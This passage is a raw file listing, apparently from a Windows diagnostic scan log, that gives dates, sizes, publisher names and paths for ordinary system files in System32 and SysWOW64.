2015-09-19 16:10 - 2010-11-20 15:27 - 00196608 _____ (Microsoft Corporation) C:\Windows\system32\shdocvw.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00188928 _____ (Microsoft Corporation) C:\Windows\system32\netjoin.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\provsvc.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00161792 _____ (Microsoft Corporation) C:\Windows\system32\ocsetapi.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00156160 _____ (Microsoft Corporation) C:\Windows\system32\prntvpt.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00149504 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00148992 _____ (Microsoft Corporation) C:\Windows\system32\t2embed.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00130048 _____ (Microsoft Corporation) C:\Windows\system32\shsetup.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00118784 _____ (Microsoft Corporation) C:\Windows\system32\wkssvc.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00117248 _____ (Microsoft Corporation) C:\Windows\system32\wpdbusenum.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00115200 _____ (Microsoft Corporation) C:\Windows\system32\WPDShServiceObj.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\thumbcache.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\QUTIL.DLL 2015-09-19 16:10 - 2010-11-20 15:27 - 00095232 _____ (Microsoft Corporation) C:\Windows\system32\regapi.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00092672 _____ (Microsoft Corporation) C:\Windows\system32\TabSvc.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00090112 _____ (Microsoft Corporation) C:\Windows\system32\nci.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00078848 _____ (Microsoft Corporation) C:\Windows\system32\WUDFSvc.dll 2015-09-19 16:10 - 
2010-11-20 15:27 - 00070656 _____ (Microsoft Corporation) C:\Windows\system32\nlaapi.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00067584 _____ (Microsoft Corporation) C:\Windows\system32\samcli.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\RpcRtRemote.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\wscapi.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\rtutils.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00046592 _____ (Microsoft Corporation) C:\Windows\system32\msasn1.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00040960 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbGDCoInstaller.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00038912 _____ (Microsoft Corporation) C:\Windows\system32\vpnikeapi.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 01457664 _____ (Microsoft Corporation) C:\Windows\system32\DxpTaskSync.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\DiagCpl.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 01066496 _____ (Microsoft Corporation) C:\Windows\system32\Display.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00861184 _____ (Microsoft Corporation) C:\Windows\system32\fontext.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00675328 _____ (Microsoft Corporation) C:\Windows\system32\DXPTaskRingtone.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00459776 _____ (Microsoft Corporation) C:\Windows\system32\DXP.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00445952 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00355328 _____ (Microsoft Corporation) C:\Windows\system32\Faultrep.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00348160 _____ (Microsoft Corporation) C:\Windows\system32\eapp3hst.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00332288 _____ (Microsoft Corporation) C:\Windows\system32\hgcpl.dll 2015-09-19 16:10 - 2010-11-20 
15:26 - 00303616 _____ (Microsoft Corporation) C:\Windows\system32\eapphost.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00279552 _____ (Microsoft Corporation) C:\Windows\system32\dxdiagn.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00239616 _____ (Microsoft Corporation) C:\Windows\system32\dskquoui.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00233984 _____ (Microsoft Corporation) C:\Windows\system32\defaultlocationcpl.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00232448 _____ (Microsoft Corporation) C:\Windows\system32\ListSvc.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00221184 _____ (Microsoft Corporation) C:\Windows\system32\mprapi.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00217088 _____ (Microsoft Corporation) C:\Windows\system32\iasrad.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00211456 _____ (Microsoft Corporation) C:\Windows\system32\mprddm.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00186880 _____ (Microsoft Corporation) C:\Windows\system32\logoncli.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00162816 _____ (Microsoft Corporation) C:\Windows\system32\dps.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00128512 _____ (Microsoft Corporation) C:\Windows\system32\dwmredir.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00118272 _____ (Microsoft Corporation) C:\Windows\system32\dnscmmc.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00116224 _____ (Windows (R) Codename Longhorn DDK provider) C:\Windows\system32\fms.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\iasacct.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00078848 _____ (Microsoft Corporation) C:\Windows\system32\hbaapi.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00072192 _____ (Microsoft Corporation) C:\Windows\system32\fdeploy.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00069120 _____ (Microsoft Corporation) C:\Windows\system32\dot3cfg.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 
00057856 _____ (Microsoft Corporation) C:\Windows\system32\licmgr10.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\lsmproxy.dll 2015-09-19 16:10 - 2010-11-20 15:26 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\mimefilt.dll 2015-09-19 16:10 - 2010-11-20 15:25 - 03745792 _____ (Microsoft Corporation) C:\Windows\system32\accessibilitycpl.dll 2015-09-19 16:10 - 2010-11-20 15:25 - 03524608 _____ (Microsoft Corporation) C:\Windows\system32\sppsvc.exe 2015-09-19 16:10 - 2010-11-20 15:25 - 01264640 _____ (Microsoft Corporation) C:\Windows\system32\sdclt.exe 2015-09-19 16:10 - 2010-11-20 15:25 - 00974336 _____ (Microsoft Corporation) C:\Windows\system32\WFS.exe 2015-09-19 16:10 - 2010-11-20 15:25 - 00749568 _____ (Microsoft Corporation) C:\Windows\system32\batmeter.dll 2015-09-19 16:10 - 2010-11-20 15:25 - 00726528 _____ (Microsoft Corporation) C:\Windows\system32\AuxiliaryDisplayCpl.dll 2015-09-19 16:10 - 2010-11-20 15:25 - 00633856 _____ (Microsoft Corporation) C:\Windows\system32\comctl32.dll 2015-09-19 16:10 - 2010-11-20 15:25 - 00349696 _____ (Microsoft Corporation) C:\Windows\system32\slui.exe 2015-09-19 16:10 - 2010-11-20 15:25 - 00314368 _____ (Microsoft Corporation) C:\Windows\system32\clusapi.dll 2015-09-19 16:10 - 2010-11-20 15:25 - 00273920 _____ (Microsoft Corporation) C:\Windows\system32\SndVol.exe 2015-09-19 16:10 - 2010-11-20 15:25 - 00257024 _____ (Microsoft Corporation) C:\Windows\system32\taskmgr.exe 2015-09-19 16:10 - 2010-11-20 15:25 - 00207872 _____ (Microsoft Corporation) C:\Windows\system32\cfgmgr32.dll 2015-09-19 16:10 - 2010-11-20 15:25 - 00186368 _____ (Microsoft Corporation) C:\Windows\system32\ocsetup.exe 2015-09-19 16:10 - 2010-11-20 15:25 - 00168448 _____ (Microsoft Corporation) C:\Windows\system32\bcdsrv.dll 2015-09-19 16:10 - 2010-11-20 15:25 - 00158720 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll 2015-09-19 16:10 - 2010-11-20 15:25 - 00139264 _____ 
(Microsoft Corporation) C:\Windows\system32\cabview.dll 2015-09-19 16:10 - 2010-11-20 15:25 - 00128000 _____ (Microsoft) C:\Windows\system32\Robocopy.exe 2015-09-19 16:10 - 2010-11-20 15:25 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\AxInstSv.dll 2015-09-19 16:10 - 2010-11-20 15:25 - 00088576 _____ (Microsoft Corporation) C:\Windows\system32\setupcl.exe 2015-09-19 16:10 - 2010-11-20 15:25 - 00069120 _____ (Microsoft Corporation) C:\Windows\system32\taskhost.exe 2015-09-19 16:10 - 2010-11-20 15:25 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\rdpsign.exe 2015-09-19 16:10 - 2010-11-20 15:25 - 00031744 _____ (Microsoft Corporation) C:\Windows\system32\proquota.exe 2015-09-19 16:10 - 2010-11-20 15:25 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\userinit.exe 2015-09-19 16:10 - 2010-11-20 15:25 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll 2015-09-19 16:10 - 2010-11-20 15:24 - 01538560 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl 2015-09-19 16:10 - 2010-11-20 15:24 - 00957440 _____ (Microsoft Corporation) C:\Windows\system32\mblctr.exe 2015-09-19 16:10 - 2010-11-20 15:24 - 00850944 _____ (Microsoft Corporation) C:\Windows\system32\mmsys.cpl 2015-09-19 16:10 - 2010-11-20 15:24 - 00793088 _____ (Microsoft Corporation) C:\Windows\system32\autoconv.exe 2015-09-19 16:10 - 2010-11-20 15:24 - 00777728 _____ (Microsoft Corporation) C:\Windows\system32\autochk.exe 2015-09-19 16:10 - 2010-11-20 15:24 - 00763904 _____ (Microsoft Corporation) C:\Windows\system32\autofmt.exe 2015-09-19 16:10 - 2010-11-20 15:24 - 00726528 _____ (Microsoft Corporation) C:\Windows\system32\appwiz.cpl 2015-09-19 16:10 - 2010-11-20 15:24 - 00684032 _____ (Microsoft Corporation) C:\Windows\system32\TabletPC.cpl 2015-09-19 16:10 - 2010-11-20 15:24 - 00515584 _____ (Microsoft Corporation) C:\Windows\system32\timedate.cpl 2015-09-19 16:10 - 2010-11-20 15:24 - 00359936 _____ (Microsoft Corporation) 
C:\Windows\system32\eudcedit.exe 2015-09-19 16:10 - 2010-11-20 15:24 - 00300032 _____ (Microsoft Corporation) C:\Windows\system32\msconfig.exe 2015-09-19 16:10 - 2010-11-20 15:24 - 00267264 _____ (Microsoft Corporation) C:\Windows\system32\FXSCOVER.exe 2015-09-19 16:10 - 2010-11-20 15:24 - 00258560 _____ (Microsoft Corporation) C:\Windows\system32\mpg2splt.ax 2015-09-19 16:10 - 2010-11-20 15:24 - 00250880 _____ (Microsoft Corporation) C:\Windows\system32\ksproxy.ax 2015-09-19 16:10 - 2010-11-20 15:24 - 00217088 _____ (Microsoft Corporation) C:\Windows\system32\wdmaud.drv 2015-09-19 16:10 - 2010-11-20 15:24 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe 2015-09-19 16:10 - 2010-11-20 15:24 - 00104960 _____ (Microsoft Corporation) C:\Windows\system32\Mpeg2Data.ax 2015-09-19 16:10 - 2010-11-20 15:24 - 00098304 _____ (Microsoft Corporation) C:\Windows\system32\WSTPager.ax 2015-09-19 16:10 - 2010-11-20 14:21 - 02983424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UIRibbon.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 02311168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wpdshext.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 02202624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SensorsCpl.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 02157568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\themecpl.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 02146304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SyncCenter.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 01624064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMPEncEn.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 01326592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlanpref.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 01227776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdc.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 01003008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMNetMgr.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00933376 _____ (Microsoft Corporation) 
C:\Windows\SysWOW64\Vault.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00850432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sbe.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00826368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpcore.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00782336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webservices.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00778240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sqlsrv32.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00464896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\scrptadm.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00458752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSDApi.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00416768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wiadefui.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00411648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlangpui.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00380416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sxs.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00372224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00363520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\StructuredQuery.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00352768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\termmgr.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00352256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmpeffects.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00346624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\untfs.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00335872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinSATAPI.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00328192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shsvcs.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00307712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\scesrv.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00305152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\taskcomp.dll 
2015-09-19 16:10 - 2010-11-20 14:21 - 00301568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srchadmin.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00276992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wcncsvc.dll 2015-09-19 16:10 - 2010-11-20 14:21 - 00246272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\scansetting.dll |